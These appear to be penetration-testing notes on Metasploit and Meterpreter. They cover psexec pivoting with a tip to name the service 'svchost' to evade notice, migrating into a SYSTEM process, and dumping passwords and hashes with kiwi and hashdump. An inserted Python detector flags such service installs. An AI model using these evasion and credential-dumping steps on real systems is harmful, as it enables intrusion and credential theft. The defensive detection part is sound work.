- Use `exploit/multi/handler` to catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.
- Use the `exploit/windows/smb/psexec` module with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the `SERVICE_FILENAME` option to remove the random garbage used, because it's suspicious (using something like `svchost` helps hide!).
- List sessions with the `sessions -l` command. Channels inside of sessions are managed with the `channels -l` command. Upgrade existing shells with the `sessions -u 1` command.
- `CTRL-Z` will background a channel or session.
- `use [module name]`
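From the defender's side, the note above (a random service name is suspicious, and a `svchost`-style name is chosen to blend in) is exactly what a detection should key on. The following is an added example, not part of the original notes: a small Python triage over constructed Windows System log Event ID 7045 ("a service was installed") records that flags a service binary served from the `ADMIN$` share, a name that mimics a core Windows process, and a random-looking mixed-case name. The event field names, the lookalike list and the case-flip threshold are my own simplifications.

```python
import re

# Constructed sample records in the shape of Windows System log Event ID 7045
# ("A service was installed"); field names are my own simplification.
SAMPLE_EVENTS = [
    {"event_id": 7045, "service_name": "XpRtKqLz",
     "image_path": r"\\127.0.0.1\ADMIN$\XpRtKqLz.exe"},
    {"event_id": 7045, "service_name": "svchost",
     "image_path": r"\\127.0.0.1\ADMIN$\svchost.exe"},
    {"event_id": 7045, "service_name": "MozillaMaintenance",
     "image_path": r"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"},
    {"event_id": 7036, "service_name": "Spooler", "image_path": ""},
]

# Core Windows process names that may be reused as a service name to blend in
# (my own short list, not exhaustive).
LOOKALIKE_NAMES = {"svchost", "lsass", "csrss", "winlogon", "services", "wininit"}
# Service binary pushed over SMB into the admin share, as a remote install does.
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.IGNORECASE)


def case_flip_ratio(name: str) -> float:
    """Fraction of adjacent letter pairs that change case: random mixed-case
    names flip almost everywhere, CamelCase words only at word boundaries."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return flips / (len(letters) - 1)


def classify(event: dict) -> list:
    """Reasons a service-install event resembles a remote service push."""
    if event.get("event_id") != 7045:
        return []
    name, path = event["service_name"], event["image_path"]
    reasons = []
    if ADMIN_SHARE.match(path):
        reasons.append("binary served from ADMIN$ share")
    if name.lower() in LOOKALIKE_NAMES:
        reasons.append("name mimics a core Windows process")
    elif case_flip_ratio(name) >= 0.5:  # heuristic threshold chosen for this example
        reasons.append("random-looking mixed-case service name")
    return reasons


def triage(events: list) -> dict:
    """Map service name -> reasons for every event that triggered at least one."""
    return {e["service_name"]: classify(e) for e in events if classify(e)}
```

On the constructed records, `triage(SAMPLE_EVENTS)` flags the random name and the `svchost` lookalike (both installed from `ADMIN$`) and leaves the Mozilla service alone.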
- We want to be running as `SYSTEM`, and we need to make sure the process we're in is the same architecture as the host. Run `sysinfo` and check the `Architecture` and `Meterpreter` info to make sure they match. If we need to move, check which running processes have the correct arch and are running as `SYSTEM` with `ps -A x64 -s`, then we can move with `migrate [PID]`. Validate the arch and meterpreter types match with `sysinfo` again.
- `load kiwi`. Running `help` will show our new mimikatz commands we can use. Using `creds_all` will dump all available hashes and plaintext passwords!
Useful Meterpreter commands:
- `help`
- `sysinfo`
- `shell`
- `getpid`
- `getuid`
- `ps`
- `migrate`
- `cd` / `lcd`
- `ls` / `lls`
- `download`
- `upload`
- `edit`
- `ipconfig`
- `route`
- `portfwd`
- `creds_all`
- `hashdump`
- `run hashdump`
- `run post/windows/gather/smart_hashdump`

Metasploit front-ends and utilities:
- `msfconsole`
- `msfd`
- `msfrpcd`
- `msfcli`
- `msfvenom`

Module types:
- `auxiliary`
- `encoders`
- `exploits`
- `nops`
- `payloads`
- `post`

Framework log: `~/.msf4/logs/framework.log`